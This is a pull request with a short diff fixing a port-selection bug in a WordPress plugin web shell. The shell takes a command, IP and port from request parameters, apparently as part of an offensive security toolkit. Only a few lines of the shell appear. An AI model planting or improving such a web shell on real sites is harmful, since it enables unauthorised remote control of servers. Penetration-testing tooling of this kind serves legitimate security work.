### PR TITLE
fix logic bug setting port number

### DIFF
--- a/Web-Shells/WordPress/plugin-shell.php
+++ b/Web-Shells/WordPress/plugin-shell.php
@@ -30,7 +30,7 @@ if(isset($_REQUEST[$cmd])) {
     # default port 443
     $port = '443';
     
-    if(isset($_REQUEST[$ip])){
+    if(isset($_REQUEST[$port])){
         $port = $_REQUEST[$port];
     }
     


### PR DESCRIPTION
The webshell checks if the `$ip` variable is set to change the port number, when it should check if the `$port` variable is set.